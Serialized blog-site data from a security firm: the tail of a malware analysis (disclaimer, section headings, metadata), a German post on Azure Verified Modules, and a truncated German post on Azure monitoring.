assets.",[353,26012,26013],{},"Contact glueckkanja's cybersecurity experts today, and let’s proactively secure your future together.",[353,26015,26016],{},[433,26017,26018],{},"Empower your defense with glueckkanja CSOC.",[13828,26020,26022],{"id":26021},"_15-security-legal-disclaimer-use-of-real-malware-code","15. Security & Legal Disclaimer – Use of Real Malware Code",[353,26024,9352],{},[353,26026,26027],{},"This publication contains detailed technical insights, including code excerpts and behavioral breakdowns derived from actual malicious software discovered during incident response and forensic investigations. The purpose of sharing this information is strictly educational, intended to help professional defenders understand, detect, and respond to real-world threats more effectively. We publish this in good faith and with the intent to contribute to the broader security community.",[353,26029,26030],{},"It is important to note that portions of the included code originate from threat actor toolkits and malware samples circulating in the wild. These fragments are not our intellectual property, nor are they to be considered safe, sanitized, or otherwise \"harmless.\" The reproduction or operational use of any such code is explicitly discouraged. Readers must understand that while this material serves a research and awareness function, it inherently carries a risk profile that should not be underestimated.",[353,26032,26033],{},"Only trained professionals operating within legally authorized environments—such as accredited security teams, SOC units, academic researchers, or malware labs—should engage with the techniques or code described. All experimentation must be confined to isolated, non-production systems, and comply with applicable laws, internal policies, and ethical standards.",[353,26035,26036],{},"We do not provide support or validation for any reproduced code or behavior. There is no guarantee of accuracy, relevance, or completeness. Furthermore, we explicitly reject any use of this content for offensive purposes, unauthorized red teaming, commercial malware development, or adversarial testing outside a legally defined scope. Any misuse may lead to legal consequences. glueckkanja AG disclaims all responsibility for direct or indirect damages arising from the use or misinterpretation of this content.",[353,26038,26039],{},"By continuing to read or reference this content, you acknowledge the above and agree not to misuse, replicate, or apply any part of it in unlawful or unethical contexts. When in doubt, consult your legal, compliance, or data protection office before engaging with live code analysis or similar technical material.",[353,26041,26042],{},"This publication is provided \"as is,\" without warranty, support, or liability.",[10832,26044,26045],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":402,"searchDepth":403,"depth":403,"links":26047},[26048,26049,26050,26051,26062,26063,26064,26065,26066,26067,26068,26069,26071,26072,26073,26074,26075,26076,26077,26078,26079,26082,26090,26091,26092,26098,26116,26134,26135,26136,26137,26145,26152,26159,26168,26175,26176,26177,26178,26179,26180,26181,26182,26183,26184,26185,26186,26187,26188,26189,26190],{"id":14001,"depth":403,"text":14002},{"id":14049,"depth":403,"text":14050},{"id":14069,"depth":403,"text":14070},{"id":14123,"depth":403,"text":14124,"children":26052},[26053,26054,26056,26058,26060],{"id":14143,"depth":704,"text":14144},{"id":14196,"depth":704,"text":26055},"2.1.2 Updater.exe – Initial Loader",{"id":14302,"depth":704,"text":26057},"2.1.3 main.exe – Obfuscated NodeJS Payload Container",{"id":14420,"depth":704,"text":26059},"2.1.4 cmd.exe & PowerShell Relay",{"id":14531,"depth":704,"text":26061},"2.1.5 python.exe with astor.py",{"id":14665,"depth":403,"text":14666},{"id":14746,"depth":403,"text":14747},{"id":14824,"depth":403,"text":14825},{"id":14903,"depth":403,"text":14904},{"id":14972,"depth":403,"text":14973},{"id":15052,"depth":403,"text":15053},{"id":15161,"depth":403,"text":15162},{"id":15278,"depth":403,"text":26070},"4.2 AMSI Bypass Technique (Class: gofor4msi)",{"id":15462,"depth":403,"text":15463},{"id":15583,"depth":403,"text":15584},{"id":15682,"depth":403,"text":15683},{"id":15778,"depth":403,"text":15779},{"id":15853,"depth":403,"text":15854},{"id":15924,"depth":403,"text":15925},{"id":15984,"depth":403,"text":15985},{"id":16124,"depth":403,"text":16125},{"id":16185,"depth":403,"text":16186,"children":26080},[26081],{"id":16197,"depth":704,"text":16198},{"id":16550,"depth":403,"text":16551,"children":26083},[26084,26085,26086,26087,26088,26089],{"id":16559,"depth":704,"text":16560},{"id":16673,"depth":704,"text":16674},{"id":16871,"depth":704,"text":16872},{"id":17161,"depth":704,"text":17162},{"id":17237,"depth":704,"text":17238},{"id":17399,"depth":704,"text":17400},{"id":17634,"depth":403,"text":17635},{"id":17680,"depth":403,"text":17681},{"id":17692,"depth":403,"text":17693,"children":26093},[26094,26095,26096,26097],{"id":17698,"depth":704,"text":17699},{"id":17742,"depth":704,"text":17743},{"id":17804,"depth":704,"text":17805},{"id":17839,"depth":704,"text":17840},{"id":17875,"depth":403,"text":26099,"children":26100},"7.3 Anti-Analysis / Evasion (Class: VmProtect)",[26101,26102,26103,26104,26106,26107,26108,26109,26110,26111,26112,26113,26114,26115],{"id":17884,"depth":704,"text":17885},{"id":17899,"depth":704,"text":17900},{"id":17939,"depth":704,"text":17940},{"id":18028,"depth":704,"text":26105},"7.3.4 VmProtect Architecture",{"id":18380,"depth":704,"text":18381},{"id":18446,"depth":704,"text":18447},{"id":18515,"depth":704,"text":18516},{"id":18579,"depth":704,"text":18580},{"id":18647,"depth":704,"text":18648},{"id":18704,"depth":704,"text":18705},{"id":18802,"depth":704,"text":18803},{"id":18871,"depth":704,"text":18872},{"id":19327,"depth":704,"text":19328},{"id":19374,"depth":704,"text":19375},{"id":19388,"depth":403,"text":19389,"children":26117},[26118,26119,26121,26123,26125,26127,26129,26131,26133],{"id":19547,"depth":704,"text":19548},{"id":19655,"depth":704,"text":26120},"7.4.2 Password Dumper (Chromium.GetPasswords)",{"id":19778,"depth":704,"text":26122},"7.4.3 Credit Card Dumper (Chromium.GetCreditCards)",{"id":19860,"depth":704,"text":26124},"7.4.4 Cookie Dumper (Chromium.GetCookies)",{"id":19940,"depth":704,"text":26126},"7.4.5 Google Session Dumper (Chromium.dump_google_sessions)",{"id":20067,"depth":704,"text":26128},"7.4.6 History Dumper (Chromium.GetHistory)",{"id":20137,"depth":704,"text":26130},"7.4.7 Autofill Dumper (Chromium.GetAutofills)",{"id":20200,"depth":704,"text":26132},"7.4.8 Firefox Profile Grabber (GeckoDriver & grabFirefoxProfiles)",{"id":20278,"depth":704,"text":20279},{"id":20317,"depth":403,"text":20318},{"id":20649,"depth":403,"text":20650},{"id":20763,"depth":403,"text":20764},{"id":21091,"depth":403,"text":21092,"children":26138},[26139,26140,26141,26142,26143,26144],{"id":21100,"depth":704,"text":21101},{"id":21251,"depth":704,"text":21252},{"id":21357,"depth":704,"text":21358},{"id":21482,"depth":704,"text":21483},{"id":21549,"depth":704,"text":21550},{"id":21674,"depth":704,"text":21675},{"id":21779,"depth":403,"text":26146,"children":26147},"7.9. Discord and Telegram Token Theft (Class: Discord)",[26148,26149,26150,26151],{"id":21793,"depth":704,"text":21794},{"id":21924,"depth":704,"text":21925},{"id":22168,"depth":704,"text":22169},{"id":22249,"depth":704,"text":22250},{"id":22319,"depth":403,"text":22320,"children":26153},[26154,26156,26157,26158],{"id":22332,"depth":704,"text":26155},"7.10.1 Data Class Initialization",{"id":22430,"depth":704,"text":22431},{"id":22550,"depth":704,"text":22551},{"id":22615,"depth":704,"text":22616},{"id":22692,"depth":403,"text":26160,"children":26161},"7.11 File Grabber (Class: Utils.steal_files)",[26162,26163,26164,26165,26166,26167],{"id":22704,"depth":704,"text":22705},{"id":22775,"depth":704,"text":22776},{"id":22837,"depth":704,"text":22838},{"id":22870,"depth":704,"text":22871},{"id":22899,"depth":704,"text":22900},{"id":23078,"depth":704,"text":23079},{"id":23186,"depth":403,"text":23187,"children":26169},[26170,26171,26172,26173,26174],{"id":23195,"depth":704,"text":23196},{"id":23210,"depth":704,"text":23211},{"id":23289,"depth":704,"text":23290},{"id":23438,"depth":704,"text":23439},{"id":23670,"depth":704,"text":23671},{"id":24022,"depth":403,"text":24023},{"id":24053,"depth":403,"text":24054},{"id":24177,"depth":403,"text":24178},{"id":24288,"depth":403,"text":24289},{"id":24339,"depth":403,"text":24340},{"id":24516,"depth":403,"text":24517},{"id":24566,"depth":403,"text":24567},{"id":24610,"depth":403,"text":24611},{"id":24650,"depth":403,"text":24651},{"id":24740,"depth":403,"text":24741},{"id":24757,"depth":403,"text":24758},{"id":25280,"depth":403,"text":25281},{"id":25586,"depth":403,"text":25587},{"id":25707,"depth":403,"text":25708},{"id":25770,"depth":403,"text":25771},{"id":25942,"depth":403,"text":25943},{"lang":2118,"seoTitle":26192,"titleClass":7896,"date":26193,"categories":26194,"blogtitlepic":26195,"socialimg":26196,"customExcerpt":26197,"keywords":26198,"maxContent":415,"asideNav":26199,"footer":26248,"contactInContent":26249,"published":415,"hreflang":26268},"Akira Stealer: Technical Analysis of a Modular Info-Stealing Malware","2025-06-16",[1117],"head-quiet-breach.png","/blog/heads/head-quiet-breach.png","It started with a single Defender alert in Microsoft 365. No malware, no signatures, no panic. Just a whisper in the noise. What we uncovered was months of credential theft - surgical, silent, and nearly invisible. This is how our CSOC turned a quiet signal into a full-scale response. And gave our client back control before they even knew it was gone.","Microsoft 365 Security, Credential Theft Detection, Incident Response, Microsoft Defender, Managed Security Services, Cloud Security, Threat Detection, Cyber Attack Detection, CSOC, Advanced Threat Protection",{"menuItems":26200},[26201,26203,26206,26209,26212,26215,26218,26221,26224,26227,26230,26233,26236,26239,26242,26245],{"href":26202,"text":13831},"#prologue",{"href":26204,"text":26205},"#_1-initial-event-and-triage-summary","Initial Event and Triage Summary",{"href":26207,"text":26208},"#_2-malware-architecture-and-execution-chain-overview","Malware Architecture and Execution Chain Overview",{"href":26210,"text":26211},"#_3-deep-dive-updaterexe","Deep Dive: Updater.exe",{"href":26213,"text":26214},"#_4-deep-dive-powbat","Deep Dive: pow.bat",{"href":26216,"text":26217},"#_5-deep-dive-mainexe-electron-based-malware-loader","Deep Dive: main.exe",{"href":26219,"text":26220},"#_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","Deep Dive: input.js",{"href":26222,"text":26223},"#_7-deepdive-akira-stealer-v2-astorpy","DeepDive: Akira Stealer v2",{"href":26225,"text":26226},"#_8-circular-execution-chain-a-self-healing-loop","Circular Execution Chain",{"href":26228,"text":26229},"#_9-blockchain-tracking-and-analysis","Blockchain Tracking and Analysis",{"href":26231,"text":26232},"#_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","Inside the Akira Ecosystem",{"href":26234,"text":26235},"#_11-akira-stealer-quickcheck-affected-files","Akira Stealer QuickCheck affected files",{"href":26237,"text":26238},"#_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","How glueckkanja CSOC Turns Incidents into Insights",{"href":26240,"text":26241},"#_13-indicators-of-compromise-iocs","Indicators of Compromise (IOCs)",{"href":26243,"text":26244},"#_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","Reflecting on the Akira Stealer Incident",{"href":26246,"text":26247},"#_15-security-legal-disclaimer-use-of-real-malware-code","Security & Legal Disclaimer",{"noMargin":415},{"quote":406,"infos":26250},{"bgColor":10589,"color":10128,"boxBgColor":10590,"boxColor":10126,"headline":10591,"subline":26251,"level":2548,"textStyling":9489,"flush":9490,"person":26252,"form":26256},"As a leading Microsoft Security MSSP, we protect companies from cyber threats every day. Let´s talk and strengthen your cyber defenses together!",{"image":10204,"cloudinary":415,"alt":9758,"name":9758,"detailsHeader":12797,"details":26253},[26254,26255],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9504,"href":9505,"icon":9506},{"ctaText":12802,"cta":26257,"method":407,"action":26258,"fields":26259},{"skin":9510},"/en/successful",[26260,26261,26262,26263,26264,26266,26267],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":12806},{"label":12808,"type":3722,"id":9519,"required":415,"requiredMsg":12809},{"label":12811,"type":9523,"id":9523,"required":415,"requiredMsg":12812},{"label":12814,"type":9527,"id":9528,"required":415,"requiredMsg":12815},{"type":9531,"id":9532,"value":26265},"Form: Blog MSSP 2025 | EN",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[26269,26271],{"lang":2118,"href":26270},"/en/posts/2025-06-16-quiet-breach",{"lang":9114,"href":26272},"/es/posts/2025-06-16-quiet-breach","/posts/2025-06-16-quiet-breach",{"title":13823,"description":9352},"posts/2025-06-16-quiet-breach",[26277,26278,26279,26280],"Microsoft 365 Defender","Threat Intelligence","Cyber Security Operations Center","Incident Deep Dive","MGvfJbw4yj2wlLZ5Y4di62TEeFMCY0lHldqgJq6PVyg",{"id":26283,"title":26284,"author":26285,"body":26286,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":26451,"moment":3,"navigation":415,"path":26484,"seo":26485,"stem":26486,"tags":26487,"webcast":406,"__hash__":26490},"content_de/posts/2025-07-22-azure-certified-modules.md","Next Level Azure IaC: Azure Verified Modules",[240],{"type":350,"value":26287,"toc":26444},[26288,26292,26294,26303,26306,26317,26320,26323,26331,26335,26337,26340,26343,26357,26360,26363,26367,26369,26372,26376,26378,26381,26384,26387,26407,26410,26418,26421,26425],[2548,26289,26291],{"id":26290},"azure-verified-module-iac-nach-microsoft-best-practices","Azure Verified Module - IaC nach Microsoft Best Practices",[353,26293,9352],{},[353,26295,26296,26297,26302],{},"Microsoft hat sich das Thema zur Brust genommen und mit den ",[374,26298,26301],{"href":26299,"rel":26300},"https://azure.github.io/Azure-Verified-Modules/",[378],"Azure Verified Modules (AVM)"," ein Framework zum strukturierten Deployment von Ressourcen in Azure nach Best Practices geschaffen.",[353,26304,26305],{},"AVM gibt es in drei verschiedenen Varianten:",[367,26307,26308,26311,26314],{},[370,26309,26310],{},"Resource Modules - Deployment einer definierten Cloud Ressource",[370,26312,26313],{},"Pattern Modules - Deployment eines definierten Cloud Workloads",[370,26315,26316],{},"Utility Modules - Hilfsmodule, welche von Resource oder Pattern Modules verwendet werden",[353,26318,26319],{},"Um einen einheitlichen Standard sicherzustellen, hat Microsoft eine Reihe von Vorgaben festgelegt, die jede neue AVM-Ressource einhalten muss. Diese Aussage trifft sowohl auf Terraform als auch auf die eigene IaC-Sprache Bicep von Microsoft Azure zu.",[353,26321,26322],{},"Jedem AVM ist ein spezifischer Mitarbeiter von Microsoft zugewiesen, der für die Erstellung, Weiterentwicklung und Bearbeitung von Problemen verantwortlich ist.",[353,26324,26325,26326,26330],{},"Sämtliche verfügbaren Module sind als Open Source (MIT-Lizenz) in öffentlichen GitHub-Repositories der allgemeinen ",[374,26327,26329],{"href":26328},"https://github.com/Azure","Azure GitHub Organisation"," ugänglich. Falls ein Modul Schwierigkeiten bereitet oder ein neuer Parameter nicht vorhanden ist, hat jeder die Möglichkeit, ein Problem zu melden oder aktiv an der Entwicklung mitzuwirken.",[2548,26332,26334],{"id":26333},"wie-fängt-man-mit-avm-an","Wie fängt man mit AVM an?",[353,26336,9352],{},[353,26338,26339],{},"AVM funktionieren wie alle anderen Module in Terraform oder Bicep; sie werden unabhängig aufgerufen und erhalten sämtliche erforderlichen Parameter. Die Vorgaben zur Erstellung von AVMs führen dazu, dass die notwendigen Parameter auf ein Minimum reduziert werden, um einen unkomplizierten Einstieg zu gewährleisten.",[353,26341,26342],{},"Beispiel Terraform: Für das Deployment einer virtuellen Maschine mit zusätzlicher Data Disk werden mindestens folgende Ressourcen in Azure benötigt:",[367,26344,26345,26348,26351,26354],{},[370,26346,26347],{},"azurerm_windows_virtual_machine oder azurerm_linux_virtual_machine",[370,26349,26350],{},"azurerm_network_interface",[370,26352,26353],{},"azurerm_managed_disk",[370,26355,26356],{},"azurerm_virtual_machine_data_disk_attachment\u003C",[353,26358,26359],{},"Jede dieser Ressourcen hat gewisse erforderliche Parameter, die oft wiederkehren, wie beispielsweise der Name der Ressourcengruppe, die Zielregion der die Bezeichnung der eigentlichen Ressource.",[353,26361,26362],{},"Mit AVM wird der Aufruf im eigenen Code auf eine einzige Ressource mit den erforderlichen Parametern vereinfacht, die anschließend im Modul weiterverarbeitet werden. Da AVM die häufigsten Microsoft Best Practices bereits integriert, sind zahlreiche Parameter mit Standardwerten versehen, wodurch eine zusätzliche Konfiguration entfällt. Ein Beispiel hierfür ist bei vielen Modulen die Festlegung von TLS 1.2 als Standardwert oder die Blockierung des öffentlichen Zugriffs.",[2548,26364,26366],{"id":26365},"was-mache-ich-wenn-es-noch-kein-avm-für-meine-ressource-gibt","Was mache ich, wenn es noch kein AVM für meine Ressource gibt?",[353,26368,9352],{},[353,26370,26371],{},"Die Open Source Lizenz von AVM ermöglicht es, auf Grundlage des Frameworks eigenständig mit der Entwicklung zu beginnen. Falls ein Mitarbeiter von Microsoft zu einem späteren Zeitpunkt die Erstellung einer offiziellen AVM-Ressource in Angriff nimmt, besteht die Möglichkeit, ganz im Sinne von Open Source, durch die bereits geleistete Vorarbeit zu unterstützen.",[2548,26373,26375],{"id":26374},"gkvm-glueckkanja-️-open-source","GKVM - glueckkanja ❤️ Open Source",[353,26377,9352],{},[353,26379,26380],{},"Wir bei glueckkanja folgen genau diesem Ansatz und unterstützen unsere Kunden auch bei der Entwicklung von Modulen, die auf dem AVM-Framework basieren und anschließend der Öffentlichkeit zugänglich gemacht werden.",[353,26382,26383],{},"Wir bezeichnen diese Module als GKVM (GlueckKanja Verified Modules), weil sie nicht nur die Vorgaben der AVM berücksichtigen, sondern auch unsere persönlichen Erkenntnisse aus zahlreichen Projekten einfließen lassen.",[353,26385,26386],{},"GKVM Resouce Modules:",[367,26388,26389,26395,26401],{},[370,26390,26391],{},[374,26392,26394],{"href":26393},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-synapse-workspace/azurerm/latest","Azure Synapse Workspace",[370,26396,26397],{},[374,26398,26400],{"href":26399},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-iot-hub/azurerm/latest","Azure IoT Hub",[370,26402,26403],{},[374,26404,26406],{"href":26405},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-messaging-eventgridsystemtopic/azurerm/latest","Azure Event Grid System Topic",[353,26408,26409],{},"GKVM Pattern Modules:",[367,26411,26412],{},[370,26413,26414],{},[374,26415,26417],{"href":26416},"https://registry.terraform.io/modules/glueckkanja/gkvm-ptn-myworkid/azurerm/latest","My WorkId",[353,26419,26420],{},"Wir freuen uns über jedes Issue, das hilft, die Module mit weiteren Funktionen auszubauen!",[2548,26422,26424],{"id":26423},"weiterführende-ressourcen","Weiterführende Ressourcen",[367,26426,26427,26432,26437],{},[370,26428,26429],{},[374,26430,26431],{"href":11467},"glueckkanja Azure Foundation",[370,26433,26434],{},[374,26435,8343],{"href":26436},"/de/posts/2023-04-14-workload-management-with-azure-foundation",[370,26438,26439],{},[374,26440,26443],{"href":26441,"rel":26442},"https://www.terraprovider.com/",[378],"Terraform Provider for Microsoft 365",{"title":402,"searchDepth":403,"depth":403,"links":26445},[26446,26447,26448,26449,26450],{"id":26290,"depth":403,"text":26291},{"id":26333,"depth":403,"text":26334},{"id":26365,"depth":403,"text":26366},{"id":26374,"depth":403,"text":26375},{"id":26423,"depth":403,"text":26424},{"lang":2183,"seoTitle":26452,"titleClass":7896,"date":26453,"categories":26454,"blogtitlepic":26455,"socialimg":26456,"customExcerpt":26457,"keywords":26458,"contactInContent":26459,"hreflang":26477,"footer":26482,"scripts":26483},"Azure Verified Modules: Standardisiertes Infrastructure as Code mit Terraform & Bicep","2025-07-22",[1773],"head-azure-certified.png","/blog/heads/head-azure-certified.png","Infrastructure-as-Code (IaC), insbesondere mit Terraform, ist ein wesentlicher Bestandteil unserer Azure Foundation und ein grundlegendes Element jeder Cloud-Transformation. Ein strukturierter Einsatz von IaC beschleunigt die Adaption von Cloudservices sowie die Entwicklung neuer Produkte. Hier stellt sich nun die Frage: Wie fängt man am besten an?","Azure Verified Modules, AVM, Infrastructure as Code, IaC, Terraform, Bicep, Microsoft Best Practices, Azure Module Deployment, Azure Foundation, Open Source Azure, Azure IaC, Azure Automation, Azure Ressourcen automatisch deployen",{"quote":406,"infos":26460},{"bgColor":12128,"color":10128,"boxBgColor":10127,"boxColor":10128,"headline":10129,"subline":26461,"level":2548,"textStyling":9489,"flush":9490,"person":26462,"form":26466},"Möchtet ihr mehr über Infrastructure as Code auf Azure erfahren? Wir zeigen euch gerne, wie ihr mit Azure Verified Modules schneller, standardisierter und nachhaltiger in der Cloud arbeitet. Ob erster Einstieg oder skalierbare Implementierung, wir unterstützen euch mit Erfahrung und Best Practices. Wir freuen uns auf eure Kontaktaufnahme!",{"image":10204,"cloudinary":415,"alt":9758,"name":9758,"detailsHeader":10135,"details":26463},[26464,26465],{"text":9499,"href":9500,"details":9501,"icon":9502},{"text":9492,"href":10436,"icon":9506},{"ctaText":9508,"cta":26467,"method":407,"action":9511,"fields":26468},{"skin":9510},[26469,26470,26471,26472,26473,26475,26476],{"label":9514,"type":3722,"id":9515,"required":415,"requiredMsg":10143},{"label":9518,"type":3722,"id":9519,"required":415,"requiredMsg":10145},{"label":9522,"type":9523,"id":9523,"required":415,"requiredMsg":10147},{"label":10149,"type":9527,"id":9528,"required":415,"requiredMsg":9529},{"type":9531,"id":9532,"value":26474},"Form: Blog Azure Verified Modules | DE",{"type":9531,"id":9535,"value":10153},{"type":9531,"id":9538},[26478,26480],{"lang":2118,"href":26479},"/en/posts/2025-07-22-azure-certified-modules",{"lang":9114,"href":26481},"/es/posts/2025-07-22-azure-certified-modules",{"noMargin":415},{"slick":415},"/posts/2025-07-22-azure-certified-modules",{"title":26284,"description":402},"posts/2025-07-22-azure-certified-modules",[26488,26489,8402,11244],"Infrastructure as Code","Azure Verified Modules","1uq8kT8an7LIlb3iwX1Rk2qmYQXziw24Pn1hhP5AB70",{"id":26492,"title":26493,"author":26494,"body":26495,"cta":3,"description":402,"eventid":3,"extension":405,"hideInRecent":406,"layout":407,"meta":26595,"moment":3,"navigation":415,"path":26626,"seo":26627,"stem":26628,"tags":26629,"webcast":406,"__hash__":26630},"content_de/posts/2025-08-27-azure-monitor.md","Monitoring, das mitwächst - organische Lösungen in Azure",[275],{"type":350,"value":26496,"toc":26587},[26497,26501,26503,26506,26510,26512,26515,26518,26535,26539,26541,26544,26547,26550,26554,26556,26559,26562,26566,26568,26571,26574,26577,26580,26582,26584],[2548,26498,26500],{"id":26499},"monitoring-in-azure","Monitoring in Azure",[353,26502,9352],{},[353,26504,26505],{},"Monitoring in der Cloud ist längst mehr als das bloße Sammeln von Metriken. In dynamischen Azure-Umgebungen geht es darum, relevante Informationen gezielt zu erfassen, sinnvoll zu visualisieren und automatisiert darauf zu reagieren. Dabei stehen nicht nur technische Aspekte im Fokus, sondern auch Fragen der Skalierbarkeit, Kostenkontrolle und Governance.",[2548,26507,26509],{"id":26508},"ganzheitliches-monitoring-mit-azure-mehr-als-nur-metriken","Ganzheitliches Monitoring mit Azure – mehr als nur Metriken",[353,26511,9352],{},[353,26513,26514],{},"Ein modernes Monitoring-Konzept in Azure umfasst verschiedene Komponenten:",[353,26516,26517],{},"Azure Monitor als zentrale Plattform für Metriken, Logs und Alerts",[367,26519,26520,26523,26526,26529,26532],{},[370,26521,26522],{},"Log Analytics für tiefgehende Analysen und Korrelationen",[370,26524,26525],{},"Application Insights für die Überwachung von Applikationen",[370,26527,26528],{},"Workbooks und Dashboards zur Visualisierung",[370,26530,26531],{},"Action Groups und Logic Apps für automatisierte Reaktionen",[370,26533,26534],{},"Besonders wertvoll wird Monitoring, wenn es nicht nur Cloud-native Ressourcen umfasst, sondern auch hybride Szenarien abdeckt. Mit Azure Arc lassen sich OnPremises-Systeme und andere Clouds nahtlos einbinden – inklusive Logging, Alerting und Policy Enforcement. So entsteht ein konsistentes Bild über die gesamte Infrastruktur hinweg.",[2548,26536,26538],{"id":26537},"veränderungen-und-bestand-im-blick-change-tracking-inventory","Veränderungen und Bestand im Blick – Change Tracking & Inventory",[353,26540,9352],{},[353,26542,26543],{},"Ein oft unterschätzter Aspekt im Monitoring ist die Nachvollziehbarkeit von Änderungen an Ressourcen. Mit Azure Change Tracking lassen sich Konfigurationsänderungen an VMs, Dateien, Registry-Einträgen und Softwareinstallationen automatisch erfassen und historisch auswerten. Das ist besonders hilfreich bei der Ursachenanalyse von Incidents oder bei der Einhaltung von Compliance-Vorgaben.",[353,26545,26546],{},"Ergänzt wird das durch die Inventory-Funktion, die eine vollständige Übersicht über installierte Software, laufende Dienste und Systemkonfigurationen bietet – sowohl für Azure-VMs als auch für über Azure Arc eingebundene OnPremises-Systeme. So entsteht ein zentraler Blick auf den technischen Zustand der Umgebung, der sich nahtlos in bestehende Monitoring- und Governance-Strukturen integrieren lässt.",[353,26548,26549],{},"In Kombination mit Log Analytics und automatisierten Alerts wird Change Tracking zu einem leistungsfähigen Werkzeug für transparente Betriebsführung, schnelle Fehleranalyse und regelkonforme Dokumentation.",[2548,26551,26553],{"id":26552},"kostenkontrolle-durch-gezieltes-logging","Kostenkontrolle durch gezieltes Logging",[353,26555,9352],{},[353,26557,26558],{},"Ein häufiger Stolperstein im Monitoring ist die Kostenentwicklung durch unkontrolliertes Logging. Azure bietet mit Log Analytics verschiedene Pricing Tiers, sodass auch die langfristige Aufbewahrung kostengünstig möglich ist. Durch die Auswahl passender Retention-Zeiten und Sampling-Strategien lassen sich Kosten deutlich reduzieren, ohne auf wichtige Informationen zu verzichten.",[353,26560,26561],{},"Ein strukturierter Ansatz hilft dabei, Logging gezielt und effizient zu gestalten. Azure Policy spielt hier eine zentrale Rolle: Mit vordefinierten Richtlinien lassen sich z. B. Diagnostic Settings automatisiert auf neue Ressourcen anwenden. Das sorgt für Konsistenz und reduziert den manuellen Aufwand erheblich.",[2548,26563,26565],{"id":26564},"monitoring-im-managed-service","Monitoring im Managed Service",[353,26567,9352],{},[353,26569,26570],{},"Ein effektives Monitoring beginnt mit einer stabilen und strukturierten Basis. In Azure-Umgebungen bietet eine Landing Zone die notwendige Grundlage, um Governance, Sicherheit und Betrieb konsistent umzusetzen. Diese Basis umfasst nicht nur die Netzwerkinfrastruktur und Identitätsverwaltung, sondern auch ein durchdachtes Monitoring-Framework.",[353,26572,26573],{},"Wie so etwas funktionieren kann, zeigt unsere Azure Foundation: Sie bringt ein Set an bewährten Alerts, Logging-Konfigurationen und Azure Policy-Kontrollen mit, die sicherstellen, dass neue Ressourcen automatisch mit den richtigen Einstellungen versehen werden. So entsteht eine Umgebung, in der Transparenz und Betriebssicherheit von Anfang an mitgedacht sind.",[353,26575,26576],{},"Darauf aufbauend können App Zones für spezifische Anwendungen bereitgestellt werden. Diese Zonen sind flexibel gestaltbar und lassen sich durch zugeschnittene Alerts und automatisiertes Logging gezielt in das bestehende Monitoring integrieren. So bleibt die Umgebung skalierbar und wächst mit den Anforderungen – ohne dabei an Übersicht oder Standardisierung zu verlieren.",[353,26578,26579],{},"Durch diese Struktur wird Monitoring nicht nur technisch sauber umgesetzt, sondern auch strategisch skalierbar. Standards sorgen für Konsistenz, während die Modularität Raum für individuelle Anforderungen lässt. Ein Managed Service kann hier unterstützen, indem er Betrieb, Pflege und Weiterentwicklung übernimmt. So entstehen Freiheiten, um sich auf das zu konzentrieren, was wirklich zählt – das eigene Kerngeschäft, die Weiterentwicklung von Produkten oder die Optimierung von Geschäftsprozessen.",[2548,26581,1088],{"id":1087},[353,26583,9352],{},[353,26585,26586],{},"Modernes Monitoring in Azure ist ein zentraler Baustein für den stabilen und sicheren Betrieb von Cloud-Umgebungen. Wer frühzeitig auf Standardisierung, Automatisierung und Kostenkontrolle setzt, schafft die Grundlage für Tran",{"title":402,"searchDepth":403,"depth":403,"links":26588},[26589,26590,26591,26592,26593,26594],{"id":26499,"depth":403,"text":26500},{"id":26508,"depth":403,"text":26509},{"id":26537,"depth":403,"text":26538},{"id":26552,"depth":403,"text":26553},{"id":26564,"depth":403,"text":26565},{"id":1087,"depth":403,"text":1088},{"lang":2183,"seoTitle":26493,"titleClass":7896,"date":26596,"categories":26597,"blogtitlepic":26598,"socialimg":26599,"customExcerpt":26600,"keywords":26601,"contactInContent":26602,"hreflang":26619,"footer":26624,"scripts":26625},"2025-08-27",[1773],"head-azure-monitor.png","/blog/heads/head-azure-monitor.png","Wie modernes Azure-Monitoring Transparenz schafft und Raum fürs Wesentliche lässt","Azure Monitor, Microsoft Best Practices, Azure, Azure Foundation",{"quote":406,"infos":26603},{"bgColor":12128,"color":10128,"boxBgColor":10127,"boxColor":10128,"headline":10059,"subline":26604,"level":2548,"textStyling":9489,"flush":9490,"person":26605,"form":26609},"Möchtet ihr mehr über Azure erfahren? Wir zeigen euch gerne, wie ihr mit Azure Verified Modules schneller, standardisierter und nachhaltiger in der Cloud arbeitet. Ob erster Einstieg oder skalierbare Implementierung, wir unterstützen euch mit 